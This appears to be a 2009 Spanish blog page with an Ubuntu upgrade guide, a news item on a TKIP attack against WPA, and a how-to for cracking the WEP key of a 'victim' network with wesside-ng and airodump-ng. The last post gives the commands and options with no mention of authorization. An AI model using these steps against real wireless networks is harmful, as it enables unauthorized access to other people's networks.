jueves, 23 de abril de 2009

Como Actualizar de Intrepid a Jaunty

Antes de comenzar

  • Tu solo puedes actualizar directamente a Ubuntu 9.04 desde Ubuntu 8.10 (ver notas)

  • Asegurate de tener todas las actualizaciones aplicadas en Ubuntu 8.10 antes de actualizar.
  • Antes de actualizar es recomendable leer las notas de lanzamiento para Ubuntu 9.04.

Actualizacion por red Ubuntu Desktops (Recomendada)

Tu puedes actualizar por la red facilmente con el siguiente procedimiento.

  1. En Sistema/Administracion/Gestor de actualizacion
  2. Click sobre Check para buscar nuevas actualizaciones.

  3. Si existe algna actualizacion hágala.

  4. Luego aparecera un mensaje avisando la disponiblilidad de una nueva distribucion.
    • um2.jpg

  5. Click en Upgrade.

  6. Siga las instrucciones en pantalla.
    • um3.jpg

Actualizar utilizando un "alternate-CD"

Use este método si no posee conexion a in Internet.

  1. Descarge el alternate installation CD

  2. queme el ISO a un CD insertelo en su CD-ROM.

    • Si el ISO esta en la computadora a ser actualizada tambien puede montar el ISO en un drive virtual con el siguiente comando:

      sudo mount -o loop ~/Desktop/ubuntu-9.04-alternate-i386.iso /media/cdrom0
  3. Le aparecera un dialogo ofertando la actualizacion por CD.
  4. Siga las instrucciones en pantalla.

Si por cualquier razón el dialogo de actualización no aparece puede correr el siguiente comando precionándo Alt+F2:

gksu "sh /cdrom/cdromupgrade"

articulo de www.ubuntu.com

martes, 21 de abril de 2009

Buena noticia airdecloak-ng + Tkiptun-ng = WPA en 15 minutos

De un tiempo a esta parte se había oído la posibilidad de crackear, no fácil ni rápidamente, la encriptación WPA de la red Wifi. A día de hoy, han puesto en práctica un método que ha roto la seguridad en apenas 15 mintuos.

La encriptación WPA es la que a día de hoy ofrece más seguridad en la encriptación de la señal WIFI, muy por encima de la encriptación WEP, y es la usada por redes empresariales. No obstante, este método no rompe la encriptación WPA2 según indican los desarrolladores.

El hueco para romper la protección ha sido encontrado en Temporal Key Integrity Protocol (TKIP - Protocolo temporal de integridad de clave) y, como avanzábamos, permite romper la seguridad entre 12-15 minutos.

El método usado no es el de ataque diccionario, con el que hasta la fecha era conocida su efectividad pero usando grandes recursos de hardware y bastante tiempo, sino que se ha basado en un avance matemático que será expuesto en una conferencia el próximo mes. No obstante, podemos ver un avance de la técnica aquí.

http://software.adslzone.net/2008/11/07/crackeada-la-seguridad-wpa-de-la-wifi-en-15-minutos/
Los links nos manda ala web oficial de aicrack-ng donde la confirman.
Para los que quieran profundizar y adelantarse a la publicacion entera de la tecnica:
http://arstechnica.com/articles/paedia/wpa-cracked.ars/1

http//:foro.segurdadwireless.net/

lunes, 20 de abril de 2009

Como hackear una red inalambrica con Wesside-ng

Las redes inalámbricas son vulnerables a multiples ataques para consiguir acceso, una buena aplicación para este fin es "Wesside-ng" de la suite "Aircrack-ng", está diseñada para un uso facil y rapido y sin la necesidad de tener mucha experiencia
solo basta con escribir en una terminal
wesside-ng "opciones" "interfaz de red"
y en minutos tendremos la clave HEX que este encriptada con WEP a mano.
.
El primer paso es poner la interfaz de red inalambrica en modo monitor con iwconfig "interfaz" mode monitor ó airmon start "interfaz"


El nombre de nuestra interfaz lo podemos ver con el comando "iwconfig" y la direccion mac de la victima la podemos obtener con "airodump-ng" ejecutandolo de esta forma.

airodump-ng "interfaz"

Esta son las opciones disponibles del wesside-ng

-h : help screen
-i : Interface to use (mandatory)
-m : My IP address
-n : Network IP address
-a : Source MAC Address
-c : Do not crack the key
-p min prga> : Minimum bytes of PRGA to gather
-v : Victim BSSID
-t : Cracking threshold
-f : Highest scanned chan (default: 11)
-k : Ignore acks and tx txnum times

osea que el modo se uso sería

wesside-ng -i "interfaz" -v "mac_victima"

y en caso de recibir el error "ERROR Max retransmists for (30 bytes)" utilizar la opcion "-k 1" entonces el comando sería de esta forma.

wesside-ng -i "interfaz" -v "mac_victima" -k 1